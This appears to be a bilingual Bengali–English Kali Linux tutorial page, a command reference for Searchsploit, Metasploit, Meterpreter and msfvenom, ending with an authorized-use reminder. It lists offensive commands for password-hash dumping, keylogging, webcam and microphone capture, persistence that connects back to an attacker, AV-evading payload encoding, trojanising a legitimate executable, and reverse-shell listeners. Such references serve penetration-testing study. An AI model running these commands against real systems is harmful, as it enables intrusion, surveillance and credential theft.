Metasploit Framework, Searchsploit, msfvenom, Netcat Reverse Shell, MSFconsole — Exploitation-এর সব প্রয়োজনীয় tool-এর সম্পূর্ণ command reference, প্রতিটি command-এর বিস্তারিত বাংলা ব্যাখ্যা সহ। Metasploit Framework, Searchsploit, msfvenom, Netcat Reverse Shell, MSFconsole — complete command reference for all Exploitation tools with detailed explanations.
| Flag / Command | কাজFunction | উদাহরণExample |
|---|---|---|
| searchsploit [keyword] | Keyword দিয়ে exploit খোঁজোSearch exploits by keyword | searchsploit apache 2.4 |
| searchsploit [soft] [ver] | Software নাম ও version দিয়ে খোঁজোSearch by software name and version | searchsploit wordpress 5.8 |
| -t keyword | শুধু Title-এ search করো (precise result)Search in title only (precise results) | searchsploit -t "remote code execution" |
| --cve CVE-XXXX | CVE number দিয়ে exploit খোঁজোSearch by CVE number | searchsploit --cve CVE-2021-44228 |
| -e keyword | Exact phrase match করোExact phrase match | searchsploit -e "Apache 2.4.49" |
| --exclude "word" | নির্দিষ্ট keyword বাদ দিয়ে খোঁজোExclude specific keyword from results | searchsploit apache --exclude "windows" |
| -w | Exploit-DB website URL দেখাওShow Exploit-DB website URLs | searchsploit -w apache 2.4 |
| -j | JSON format-এ output দেখাওShow output in JSON format | searchsploit -j apache | python3 -m json.tool |
| --nmap file.xml | Nmap XML scan result থেকে exploit খোঁজোSearch exploits from Nmap XML scan results | searchsploit --nmap scan.xml |
| Flag | কাজFunction | উদাহরণExample |
|---|---|---|
| -p EDB-ID | Exploit-এর full path দেখাওShow full path of exploit | searchsploit -p 42966 |
| -m EDB-ID | Exploit বর্তমান directory-তে copy করোCopy exploit to current directory | searchsploit -m 42966 |
| -x EDB-ID | Exploit file directly examine/read করোDirectly examine/read exploit file | searchsploit -x 42966 |
| --update | Exploit database update করোUpdate exploit database | searchsploit --update |
| কমান্ডCommand | কাজFunction | উদাহরণExample |
|---|---|---|
| help | সব available command দেখাওShow all available commands | help |
| help [command] | নির্দিষ্ট command-এর help দেখাওShow help for specific command | help search |
| search [keyword] | Module খোঁজো — name, CVE, author দিয়েSearch modules by name, CVE, author | search eternalblue |
| search type:exploit | শুধু exploit module খোঁজোSearch only exploit modules | search type:exploit platform:windows |
| search cve:2021 | CVE year দিয়ে খোঁজোSearch by CVE year | search cve:2021 type:exploit |
| use [module] | Module select করোSelect a module | use exploit/windows/smb/ms17_010_eternalblue |
| use [number] | Search result-এর number দিয়ে module select করোSelect module by search result number | use 0 |
| info | Current module-এর বিস্তারিত তথ্য দেখাওShow detailed info about current module | info |
| show options | Module-এর configurable options দেখাওShow module's configurable options | show options |
| show advanced | Advanced options দেখাওShow advanced options | show advanced |
| show payloads | Compatible payloads দেখাওShow compatible payloads | show payloads |
| show targets | Available exploit targets দেখাওShow available exploit targets | show targets |
| set [OPTION] [value] | Option-এর value সেট করোSet value for an option | set RHOSTS 192.168.1.5 |
| setg [OPTION] [value] | Global value সেট করো (সব module-এ কাজ করবে)Set global value (applies to all modules) | setg LHOST 192.168.1.100 |
| unset [OPTION] | Option-এর value clear করোClear an option's value | unset RHOSTS |
| run / exploit | Exploit চালাওRun the exploit | run |
| run -j | Background-এ job হিসেবে চালাওRun as background job | run -j |
| check | Target vulnerable কিনা check করো (exploit না করে)Check if target is vulnerable (without exploiting) | check |
| back | Current module থেকে বেরিয়ে আসোExit current module | back |
| exit / quit | Metasploit বন্ধ করোExit Metasploit | exit |
| sessions | সব active session দেখাওShow all active sessions | sessions |
| sessions -i [id] | নির্দিষ্ট session-এ interact করোInteract with specific session | sessions -i 1 |
| sessions -k [id] | নির্দিষ্ট session kill করোKill a specific session | sessions -k 1 |
| sessions -l | সব session list করোList all sessions | sessions -l |
| jobs | Background jobs দেখাওShow background jobs | jobs |
| kill [job_id] | Background job kill করোKill a background job | kill 0 |
| background / Ctrl+Z | Current session background-এ পাঠাওSend current session to background | background |
| spool file.txt | Console output file-এ save করোSave console output to file | spool /tmp/msf_log.txt |
| makerc file.rc | Session-এর commands resource file-এ save করোSave session commands to resource file | makerc /tmp/commands.rc |
| কমান্ডCommand | কাজFunction |
|---|---|
| db_status | Database connection status দেখাওShow database connection status |
| workspace | বর্তমান workspace দেখাওShow current workspace |
| workspace -a [name] | নতুন workspace তৈরি করোCreate new workspace |
| workspace [name] | Workspace switch করোSwitch to workspace |
| workspace -d [name] | Workspace delete করোDelete workspace |
| db_nmap [options] target | Nmap চালাও ও result database-এ save করোRun Nmap and save results to database |
| db_import scan.xml | External scan result import করো (Nmap XML)Import external scan results (Nmap XML) |
| hosts | Database-এ stored hosts দেখাওShow hosts stored in database |
| services | Discovered services দেখাওShow discovered services |
| vulns | Known vulnerabilities দেখাওShow known vulnerabilities |
| creds | Collected credentials দেখাওShow collected credentials |
| loot | Collected loot দেখাওShow collected loot |
| db_export -f xml output.xml | Database export করোExport database |
Vulnerability exploit করে target system-এ access নেয়।Exploits vulnerability to gain access to target system.
Scanning, fuzzing, sniffing, brute force করে — exploit ছাড়া।Scanning, fuzzing, sniffing, brute force — without exploiting.
Exploit-এর পরে target-এ execute হয়। Shell, Meterpreter ইত্যাদি।Executes on target after exploit. Shell, Meterpreter, etc.
Session পাওয়ার পরে চালানো হয় — privilege escalation, data collection।Run after getting a session — privilege escalation, data collection.
| Module Path | CVE | Target | বিবরণDescription |
|---|---|---|---|
exploit/windows/smb/ms17_010_eternalblue | CVE-2017-0144 | Windows 7/2008 | EternalBlue — NSA exploit, WannaCry-তে ব্যবহৃতEternalBlue — NSA exploit, used in WannaCry |
exploit/windows/smb/ms08_067_netapi | MS08-067 | Windows XP/2003 | Classic Windows SMB exploitClassic Windows SMB exploit |
exploit/multi/handler | — | Any | Reverse shell listener (সবচেয়ে বেশি ব্যবহৃত)Reverse shell listener (most used) |
exploit/unix/ftp/vsftpd_234_backdoor | — | Linux | vsFTPd 2.3.4 backdoorvsFTPd 2.3.4 backdoor |
exploit/multi/samba/usermap_script | CVE-2007-2447 | Linux Samba | Samba usermap script injectionSamba usermap script injection |
exploit/windows/http/rejetto_hfs_exec | CVE-2014-6287 | HFS Windows | HTTP File Server RCEHTTP File Server RCE |
auxiliary/scanner/portscan/tcp | — | Any | MSF দিয়ে TCP port scanTCP port scan with MSF |
auxiliary/scanner/smb/smb_login | — | Windows | SMB login brute forceSMB login brute force |
auxiliary/scanner/http/http_login | — | Web | HTTP form brute forceHTTP form brute force |
post/multi/recon/local_exploit_suggester | — | Any | Local PrivEsc exploit suggest করোSuggest local PrivEsc exploits |
post/windows/gather/hashdump | — | Windows | Windows password hash dump করোDump Windows password hashes |
post/linux/gather/hashdump | — | Linux | Linux /etc/shadow dump করোDump Linux /etc/shadow |
| Module | কাজFunction |
|---|---|
| auxiliary/scanner/portscan/tcp | TCP port scan করোTCP port scan |
| auxiliary/scanner/smb/smb_version | SMB version detect করোDetect SMB version |
| auxiliary/scanner/smb/smb_login | SMB login brute force করোBrute force SMB login |
| auxiliary/scanner/ssh/ssh_login | SSH login brute force করোBrute force SSH login |
| auxiliary/scanner/ftp/ftp_login | FTP login brute force করোBrute force FTP login |
| auxiliary/scanner/http/http_version | Web server version detect করোDetect web server version |
| auxiliary/scanner/http/dir_scanner | Web directory scan করোScan web directories |
| auxiliary/scanner/vnc/vnc_login | VNC login brute force করোBrute force VNC login |
| auxiliary/gather/dns_enum | DNS enumeration করোDNS enumeration |
| auxiliary/sniffer/psnuffle | Network traffic sniff করোSniff network traffic |
| কমান্ডCommand | কাজFunction |
|---|---|
| sysinfo | System information দেখাও (OS, hostname, arch)Show system info (OS, hostname, arch) |
| getuid | বর্তমান user দেখাওShow current user |
| getpid | বর্তমান process ID দেখাওShow current process ID |
| ps | সব running process দেখাওShow all running processes |
| migrate [PID] | অন্য process-এ migrate করো (stability/evasion)Migrate to another process (stability/evasion) |
| kill [PID] | Process kill করোKill a process |
| shell | Regular OS shell-এ যাও (cmd.exe বা /bin/sh)Drop into regular OS shell (cmd.exe or /bin/sh) |
| execute -f cmd -i | Command execute করো interactive mode-এExecute command in interactive mode |
| reboot | Target system reboot করোReboot target system |
| shutdown | Target system shutdown করোShutdown target system |
| idletime | User কতক্ষণ idle আছে দেখাওShow how long user has been idle |
| env | Environment variables দেখাওShow environment variables |
| কমান্ডCommand | কাজFunction |
|---|---|
| pwd | বর্তমান directory দেখাও (target-এ)Show current directory (on target) |
| ls | Directory contents দেখাওList directory contents |
| cd [path] | Directory change করোChange directory |
| cat [file] | File content দেখাওShow file content |
| download [file] | Target থেকে file download করোDownload file from target |
| upload [file] [path] | Target-এ file upload করোUpload file to target |
| edit [file] | Target-এর file edit করোEdit file on target |
| rm [file] | File delete করোDelete file |
| mkdir [dir] | Directory তৈরি করোCreate directory |
| search -f *.txt | File খোঁজোSearch for files |
| search -f passwords.txt -d C:\\ | C drive-এ password file খোঁজোSearch for password file on C drive |
| lpwd | Attacker machine-এর বর্তমান directoryCurrent directory on attacker machine |
| lcd [path] | Attacker machine-এ directory change করোChange directory on attacker machine |
| কমান্ডCommand | কাজFunction |
|---|---|
| ipconfig / ifconfig | Network interface ও IP দেখাওShow network interfaces and IPs |
| arp | ARP table দেখাওShow ARP table |
| route | Routing table দেখাওShow routing table |
| netstat | Active network connections দেখাওShow active network connections |
| portfwd add -l 8080 -p 80 -r target | Port forward করো (pivot করার জন্য)Set up port forwarding (for pivoting) |
| portfwd list | Port forward rules দেখাওList port forward rules |
| portfwd delete -l 8080 | Port forward rule মুছোRemove port forward rule |
| কমান্ডCommand | কাজFunction |
|---|---|
| getsystem | SYSTEM privilege পাওয়ার চেষ্টা করো (Windows)Attempt to gain SYSTEM privileges (Windows) |
| getprivs | বর্তমান privileges দেখাওShow current privileges |
| use post/multi/recon/local_exploit_suggester | Local PrivEsc exploits suggest করোSuggest local PrivEsc exploits |
| hashdump | Windows password hash dump করো (SYSTEM লাগে)Dump Windows password hashes (needs SYSTEM) |
| run post/windows/gather/hashdump | Post module দিয়ে hash dump করোDump hashes using post module |
| load incognito | Token impersonation extension load করোLoad token impersonation extension |
| list_tokens -u | Available tokens দেখাও (incognito)Show available tokens (incognito) |
| impersonate_token "DOMAIN\\Admin" | Admin token impersonate করোImpersonate admin token |
| কমান্ডCommand | কাজFunction |
|---|---|
| screenshot | Target-এর screen screenshot নাওTake screenshot of target's screen |
| keyscan_start | Keylogger চালু করোStart keylogger |
| keyscan_dump | Logged keystrokes দেখাওShow logged keystrokes |
| keyscan_stop | Keylogger বন্ধ করোStop keylogger |
| webcam_list | Available webcam দেখাওList available webcams |
| webcam_snap | Webcam দিয়ে ছবি তোলোTake photo with webcam |
| webcam_stream | Webcam live stream দেখোView live webcam stream |
| record_mic -d 10 | ১০ সেকেন্ড microphone record করোRecord microphone for 10 seconds |
| কমান্ডCommand | কাজFunction |
|---|---|
| run persistence -h | Persistence module help দেখাওShow persistence module help |
| run persistence -S -U -X -i 30 -p 4444 -r LHOST | Startup/User login-এ auto-connect করোAuto-connect on startup/user login |
| run post/windows/manage/persistence_exe | Windows persistence setup করোSet up Windows persistence |
| run post/linux/manage/cron_persistence | Linux cron দিয়ে persistence করোSet up Linux cron persistence |
| Flag | কাজFunction | উদাহরণExample |
|---|---|---|
| -p payload | Payload specify করোSpecify payload | -p windows/x64/meterpreter/reverse_tcp |
| LHOST=IP | Attacker IP সেট করোSet attacker IP | LHOST=192.168.1.100 |
| LPORT=port | Attacker listening port সেট করোSet attacker listening port | LPORT=4444 |
| -f format | Output format specify করোSpecify output format | -f exe / -f elf / -f apk / -f raw |
| -o file | Output file নাম দাওSet output filename | -o payload.exe |
| -e encoder | Encoder ব্যবহার করো (AV bypass)Use encoder (AV bypass) | -e x86/shikata_ga_nai |
| -i count | Encoding iterations বাড়াওIncrease encoding iterations | -i 10 |
| -b "\x00" | Bad characters avoid করোAvoid bad characters | -b "\x00\x0a\x0d" |
| -n bytes | NOP sled যোগ করোAdd NOP sled | -n 10 |
| -x template | Legitimate exe-এর মধ্যে payload inject করোInject payload into legitimate exe | -x putty.exe |
| -k | Template exe-কে functional রাখো (-x এর সাথে)Keep template exe functional (with -x) | -k -x putty.exe |
| --list payloads | সব available payload দেখাওList all available payloads | msfvenom --list payloads |
| --list formats | সব output format দেখাওList all output formats | msfvenom --list formats |
| --list encoders | সব encoder দেখাওList all encoders | msfvenom --list encoders |
| ধরনType | উদাহরণExample | বিবরণDescription | কখন ব্যবহারWhen to Use |
|---|---|---|---|
| Staged | windows/x64/meterpreter/reverse_tcp | ছোট payload — Metasploit থেকে বাকি অংশ download করেSmall payload — downloads rest from Metasploit | Normal network access আছেNormal network access |
| Stageless | windows/x64/meterpreter_reverse_tcp | বড় payload — সব কিছু ভেতরে আছে, download দরকার নেইLarge self-contained payload — no download needed | Restricted network বা AV evasionRestricted network or AV evasion |
nc -lvnp 4444 দিয়ে listener চালু রাখতে হবে।
Target machine → connects back to attacker. Attacker must first run nc -lvnp 4444 to start a listener.
search দিয়ে Metasploit module খোঁজোSearch: Find Metasploit module using search in MSFconsolecheck করো তারপর run করোRun: First check then runlocal_exploit_suggester চালাওPrivEsc: Run local_exploit_suggester💥 "Exploitation is not just about running tools — it's about understanding the target."
সব কিছু authorized environment-এ practice করো। Permission ছাড়া exploit করা সম্পূর্ণ illegal। Practice everything in authorized environments only. Exploiting without permission is completely illegal.
Kali Linux Series — Part 3 | v1.0 | Exploitation Tools
Part 4: Password Attacks + Wireless (Hashcat, John, Hydra, Aircrack-ng) →